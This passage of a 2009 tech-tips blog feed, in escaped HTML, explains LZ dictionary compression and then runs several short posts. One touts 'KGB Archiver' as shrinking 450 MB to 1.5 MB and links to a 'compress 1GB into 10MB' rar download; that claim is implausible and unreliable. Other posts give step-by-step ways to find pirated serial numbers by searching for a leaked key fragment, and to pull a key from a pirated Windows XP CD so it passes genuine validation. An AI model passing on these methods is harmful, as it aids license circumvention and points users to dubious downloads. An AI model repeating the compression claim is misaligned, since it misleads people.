&lt;/p&gt;  &lt;p style="font-family: arial;"&gt;The system for arranging dictionaries varies, but it could be as simple as a numbered list. When we go through Kennedy's famous words, we pick out the words that are repeated and put them into the numbered index. Then, we simply write the number instead of writing out the whole word. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;So, if this is our dictionary: &lt;/p&gt;  &lt;div style="font-family: arial;" align="center"&gt;  &lt;table class="MsoNormalTable" style="background: rgb(238, 244, 246) none repeat scroll 0% 0%; width: 112.5pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" border="1" cellpadding="0" cellspacing="0" width="150"&gt;  &lt;tbody&gt;&lt;tr style=""&gt;   &lt;td style="padding: 2.25pt;"&gt;   &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;ask &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;what &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;your &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;country &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;can &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;do &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;for &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;you &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;/ol&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;  &lt;/div&gt;  &lt;p style="font-family: arial;"&gt;Our sentence now reads: &lt;/p&gt;  &lt;div style="font-family: arial;" align="center"&gt;  &lt;table class="MsoNormalTable" style="background: rgb(238, 244, 246) none repeat scroll 0% 0%; width: 225pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" border="1" cellpadding="0" cellspacing="0" width="300"&gt;  &lt;tbody&gt;&lt;tr style=""&gt;   &lt;td style="padding: 2.25pt;"&gt;   &lt;p class="MsoNormal" style="text-align: center;" align="center"&gt;&lt;strong&gt;"1 not 2 3 4 5 6 7 8 -- 1 2 8 5 6 7 3 4"&lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;  &lt;/div&gt;  &lt;p style="font-family: arial;"&gt;&lt;br /&gt;If you knew the system, you could easily reconstruct the original phrase using only this dictionary and number pattern. This is what the expansion program on your &lt;span style="text-decoration: underline;"&gt;computer&lt;/span&gt; does when it expands a downloaded file. You might also have encountered compressed files that open themselves up. To create this sort of file, the programmer includes a simple expansion program with the compressed file. It automatically reconstructs the original file once it's downloaded. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;But how much space have we actually saved with this system? "1 not 2 3 4 5 6 7 8 -- 1 2 8 5 6 7 3 4" is certainly shorter than "Ask not what your country can do for you; ask what you can do for your country;" but keep in mind that we need to &lt;strong&gt;save the dictionary itself along with the file&lt;/strong&gt;. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;In an actual compression scheme, figuring out the various file requirements would be fairly complicated; but for our purposes, let's go back to the idea that every character and every space takes up one unit of memory. We already saw that the full phrase takes up 79 units. Our compressed sentence (including spaces) takes up 37 units, and the dictionary (words and numbers) also takes up 37 units. This gives us a file size of 74, so we haven't reduced the file size by very much. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;But this is only one sentence! You can imagine that if the compression program worked through the rest of Kennedy's speech, it would find these words and others repeated many more times. And, as we'll see in the next section, it would also be rewriting the dictionary to get the most efficient organization possible&lt;/p&gt;  &lt;p style="font-family: arial;" class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;h1 style="font-family: arial;"&gt;&lt;span style="font-weight: bold;font-size:130%;" &gt;Pattern Searching&lt;/span&gt;&lt;br /&gt;&lt;/h1&gt;  &lt;p style="font-family: arial;"&gt;In our previous example, we picked out all the repeated words and put those in a dictionary. To us, this is the most obvious way to write a dictionary. But a compression program sees it quite differently: It doesn't have any concept of separate words -- it only looks for patterns. And in order to reduce the file size as much as possible, it carefully selects which patterns to include in the dictionary. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;If we approach the phrase from this perspective, we end up with a completely different dictionary. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;If the compression program scanned Kennedy's phrase, the first redundancy it would come across would be only a couple of letters long. In "ask not what your," there is a repeated pattern of the letter "t" followed by a space -- in "not" and "what." If the compression program wrote this to the dictionary, it could write a "1" every time a "t" were followed by a space. But in this short phrase, this pattern doesn't occur enough to make it a worthwhile entry, so the program would eventually overwrite it. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;The next thing the program might notice is "ou," which appears in both "your" and "country." If this were a longer document, writing this pattern to the dictionary could save a lot of space -- "ou" is a fairly common combination in the English language. But as the compression program worked through this sentence, it would quickly discover a better choice for a dictionary entry: Not only is "ou" repeated, but the entire words "your" and "country" are both repeated, and they are actually repeated together, as the phrase "your country." In this case, the program would overwrite the dictionary entry for "ou" with the entry for "your country." &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;The phrase "can do for" is also repeated, one time followed by "your" and one time followed by "you," giving us a repeated pattern of "can do for you." This lets us write 15 characters (including spaces) with one number value, while "your country" only lets us write 13 characters (with spaces) with one number value, so the program would overwrite the "your country" entry as just "r country," and then write a separate entry for "can do for you." The program proceeds in this way, picking up all repeated bits of information and then calculating which patterns it should write to the dictionary. This ability to rewrite the dictionary is the "adaptive" part of &lt;strong&gt;LZ adaptive dictionary-based algorithm&lt;/strong&gt;. The way a program actually does this is fairly complicated, as you can see by the discussions on. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;No matter what specific method you use, this in-depth searching system lets you compress the file much more efficiently than you could by just picking out words. Using the patterns we picked out above, and adding "__" for spaces, we come up with this larger dictionary: &lt;/p&gt;  &lt;div style="font-family: arial;" align="center"&gt;  &lt;table class="MsoNormalTable" style="background: rgb(238, 244, 246) none repeat scroll 0% 0%; width: 186.85pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" border="1" cellpadding="0" cellspacing="0" width="249"&gt;  &lt;tbody&gt;&lt;tr style="height: 64.2pt;"&gt;   &lt;td style="padding: 2.25pt; height: 64.2pt;"&gt;   &lt;ol start="1" type="1"&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;ask__ &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;what__ &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;you &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;r__country &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;li class="MsoNormal" style=""&gt;&lt;strong&gt;__can__do__for__you &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/li&gt;&lt;/ol&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;  &lt;/div&gt;  &lt;p style="font-family: arial;"&gt;&lt;br /&gt;And this smaller sentence: &lt;/p&gt;  &lt;div style="font-family: arial;" align="center"&gt;  &lt;table class="MsoNormalTable" style="background: rgb(238, 244, 246) none repeat scroll 0% 0%; width: 187.5pt; -moz-background-clip: -moz-initial; -moz-background-origin: -moz-initial; -moz-background-inline-policy: -moz-initial;" border="1" cellpadding="0" cellspacing="0" width="250"&gt;  &lt;tbody&gt;&lt;tr style=""&gt;   &lt;td style="padding: 2.25pt;"&gt;   &lt;p class="MsoNormal" style="text-align: center;" align="center"&gt;&lt;strong&gt;"1not__2345__--__12354" &lt;/strong&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt; &lt;/tbody&gt;&lt;/table&gt;  &lt;/div&gt;  &lt;p style="font-family: arial;"&gt;&lt;br /&gt;The sentence now takes up 18 units of memory, and our dictionary takes up 41 units. So we've compressed the total file size from 79 units to 59 units! This is just one way of compressing the phrase, and not necessarily the most efficient one. (See if you can find a better way!) &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;So how good is this system? The &lt;strong&gt;file-reduction ratio&lt;/strong&gt; depends on a number of factors, including file type, file size and compression scheme. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;In most languages of the world, certain letters and words often appear together in the same pattern. Because of this high rate of redundancy, &lt;strong&gt;text files&lt;/strong&gt; compress very well. A reduction of 50 percent or more is typical for a good-sized text file. Most &lt;strong&gt;programming languages&lt;/strong&gt; are also very redundant because they use a relatively small collection of commands, which frequently go together in a set pattern. Files that include a lot of unique information, such as graphics or MP3 files, cannot be compressed much with this system because they don't repeat many patterns (more on this in the next section). &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;If a file has a lot of repeated patterns, the rate of reduction typically increases with file size. You can see this just by looking at our example -- if we had more of Kennedy's speech, we would be able to refer to the patterns in our dictionary more often, and so get more out of each entry's file space. Also, more pervasive patterns might emerge in the longer work, allowing us to create a more efficient dictionary. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;This efficiency also depends on the specific algorithm used by the compression program. Some programs are particularly suited to picking up patterns in certain types of files, and so may compress them more succinctly. Others have dictionaries within dictionaries, which might compress efficiently for larger files but not for smaller ones. While all compression programs of this sort work with the same basic idea, there is actually a good deal of variation in the manner of execution. Programmers are always trying to build a better system. &lt;/p&gt;  &lt;p style="font-family: arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-family: arial;"&gt;For more information use the following link&lt;/p&gt;  &lt;p style="font-family: arial;"&gt;&lt;a href="http://computer.howstuffworks.com/framed.htm?parent=file-compression.htm&amp;amp;url=http://www.data-compression.com/lossless.html"&gt;Data-Compression.com&lt;/a&gt;&lt;/p&gt;  &lt;p style="font-family: arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p style="font-family: arial;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;&lt;span style="font-family:arial;"&gt;Have you guy ever heard the program call KGB Archiver. A few days ago I downloaded It to my surprise this program to compressed 450mb into 1.5mb. It is one of the best comp&lt;/span&gt;&lt;span style=";font-family:arial;font-size:100%;"  &gt;ression softwares in the world&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_T53992hHLOM/Sen0-Bt_9fI/AAAAAAAAAHs/ytV612wxL2g/s1600-h/KGB.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 345px;" src="http://3.bp.blogspot.com/_T53992hHLOM/Sen0-Bt_9fI/AAAAAAAAAHs/ytV612wxL2g/s400/KGB.jpg" alt="" id="BLOGGER_PHOTO_ID_5326057380792759794" border="0" /&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=";font-family:arial;font-size:100%;"  &gt;Download it from the following link&lt;/span&gt;&lt;/p&gt;&lt;p style="font-family: arial;"&gt;&lt;span style="font-size:100%;"&gt;http://www.ziddu.com/download/4352440/KGB_Compress_1GB_into_10MB.rar.html&lt;/span&gt;&lt;/p&gt;&lt;p style="font-family: arial;"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="font-family: arial;"&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;DATA COMPRESSION MAY RESULT IN IRRECOVERABLE DATA CORRUPTION SO IT IS ADVISED TO USE THE SOFTWARE'S ONLY WHEN REQUIRED.THE MORE IS THE REDUCTION IN SIZE MORE ARE THE CHANCES OF ACCIDENTAL DATA LOSS&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-style: italic;font-size:85%;" &gt;source :(wikipedia,google,data compression.com)&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-5401012303848202683?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/5401012303848202683/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/file-compression.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5401012303848202683'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5401012303848202683'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/file-compression.html' title='FILE COMPRESSION'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/Sen1lHxQ1uI/AAAAAAAAAH4/821lhhnLHfQ/s72-c/winrar.jpg' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-5339447649815510458</id><published>2009-04-18T01:07:00.000-07:00</published><updated>2009-04-18T07:33:13.325-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='DOWNLOADS'/><title type='text'>GET THE SERIAL KEY WITH GOOGLE</title><content type='html'>Get the required serial number of the software you need from google (Applicable for MOST softwares)&lt;br /&gt;&lt;br /&gt;Go to Google.&lt;br /&gt;&lt;br /&gt;In the search field type: "Software name" 94FBR&lt;br /&gt;&lt;br /&gt;* Where, "Software Name" is the name of the software, game etc  you want to find the serial number for.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;HOW DOES THIS WORK?&lt;br /&gt;&lt;br /&gt;94FBR is part of a Office 2000 Pro cd key that is widely distributed as it bypasses the activation requirements of Office 2000 Pro. By searching for the product name and 94fbr, you guarantee two things.&lt;br /&gt;1) The pages that are returned are pages dealing specifically with the product you're wanting a serial for.&lt;br /&gt;2) Because 94FBR is part of a serial number, and only part of a serial number, you guarantee that any page being returned is a serial number list page.&lt;br /&gt;&lt;br /&gt;See these example searches:&lt;br /&gt;&lt;br /&gt;"Nero 9" 94FBR&lt;br /&gt;"photoshop 7" 94FBR&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_T53992hHLOM/Sd-ngVI-5gI/AAAAAAAAAFw/lj-jIFSiHag/s1600-h/google.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 55px;" src="http://1.bp.blogspot.com/_T53992hHLOM/Sd-ngVI-5gI/AAAAAAAAAFw/lj-jIFSiHag/s400/google.jpg" alt="" id="BLOGGER_PHOTO_ID_5323157458447689218" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-5339447649815510458?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/5339447649815510458/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/get-serial-key-with-google.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5339447649815510458'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5339447649815510458'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/get-serial-key-with-google.html' title='GET THE SERIAL KEY WITH GOOGLE'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/Sd-ngVI-5gI/AAAAAAAAAFw/lj-jIFSiHag/s72-c/google.jpg' height='72' width='72'/><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-4304286414187815338</id><published>2009-04-17T08:23:00.000-07:00</published><updated>2009-04-17T07:54:08.433-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='windows'/><title type='text'>Getting original xp key from pirated XP CD!!</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_T53992hHLOM/SeDpHz8SGgI/AAAAAAAAAGU/07Fdto1aPFo/s1600-h/2igir6x.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://4.bp.blogspot.com/_T53992hHLOM/SeDpHz8SGgI/AAAAAAAAAGU/07Fdto1aPFo/s400/2igir6x.jpg" alt="" id="BLOGGER_PHOTO_ID_5323511079963335170" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;span style=";font-family:&amp;quot;;font-size:12;"  &gt;There is one simple method to get original Windows Xp Key From Pirated Windows Xp .As many people use pirated Windows Cd instead of original cd's/Dvds (coz pirated ones are cheapest and original are costly) but such users are denied of many benifits like Windows secuirity updates,usage of genuine Microsoft add-ons etc ..here is a way to legalise ur windows(provided teh key has not been blacklisted by Microsoft)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1.) Insert the CD in your drive.&lt;br /&gt;2.) Right click it and select open.&lt;br /&gt;3.) Open the folder named I386.&lt;br /&gt;4.) In this folder there is a note pad file UNATTEND.txt&lt;br /&gt;5.) Open this file and browse till the last line.&lt;br /&gt;6.) You'll find there a original xp key.&lt;br /&gt;7.) Use this key while installing xp and there are 98% chance that your copy of XP will come out of Windows validation as a geniune copy&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-4304286414187815338?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/4304286414187815338/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/getting-original-xp-key-from-pirated-xp.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4304286414187815338'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/4304286414187815338'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/getting-original-xp-key-from-pirated-xp.html' title='Getting original xp key from pirated XP CD!!'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_T53992hHLOM/SeDpHz8SGgI/AAAAAAAAAGU/07Fdto1aPFo/s72-c/2igir6x.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-7252289172649825310</id><published>2009-04-16T11:50:00.000-07:00</published><updated>2009-04-16T07:53:50.707-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tricks n tips'/><title type='text'>Speed up your Acrobat reader almost like notepad</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_T53992hHLOM/SeDm4NczsxI/AAAAAAAAAGI/W9vZNOcUlag/s1600-h/img_3109_adobe-reader_450x360.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 400px; height: 300px;" src="http://2.bp.blogspot.com/_T53992hHLOM/SeDm4NczsxI/AAAAAAAAAGI/W9vZNOcUlag/s400/img_3109_adobe-reader_450x360.jpg" alt="" id="BLOGGER_PHOTO_ID_5323508612909478674" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p style="text-align: left;"&gt;&lt;b&gt;Do u get irritated when acrobat reader takes 5 to10 seconds to load when you want to open a pdf file. There is a way to speed up the loading.&lt;br /&gt;&lt;br /&gt;1. Go to the installation folder of acrobat reader&lt;br /&gt;(C:\program files\adobe\acrobat\reader\.. whatever)&lt;br /&gt;&lt;br /&gt;2. Move all the files and folders from the "plugins" directory to the "Optional" directory. (I repeat.. cut and paste the files NOT copy &amp;amp; paste).&lt;br /&gt;&lt;br /&gt;Also make sure that acrobat reader is not open else it will lock the files and not allow you to move the files).&lt;br /&gt;&lt;br /&gt;Now your acrobat reader will load very fast&lt;br /&gt;and almost as good as notepad..&lt;/b&gt;&lt;/p&gt;  &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-7252289172649825310?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/7252289172649825310/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/speed-up-your-acrobat-reader-almost.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7252289172649825310'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/7252289172649825310'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/speed-up-your-acrobat-reader-almost.html' title='Speed up your Acrobat reader almost like notepad'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_T53992hHLOM/SeDm4NczsxI/AAAAAAAAAGI/W9vZNOcUlag/s72-c/img_3109_adobe-reader_450x360.jpg' height='72' 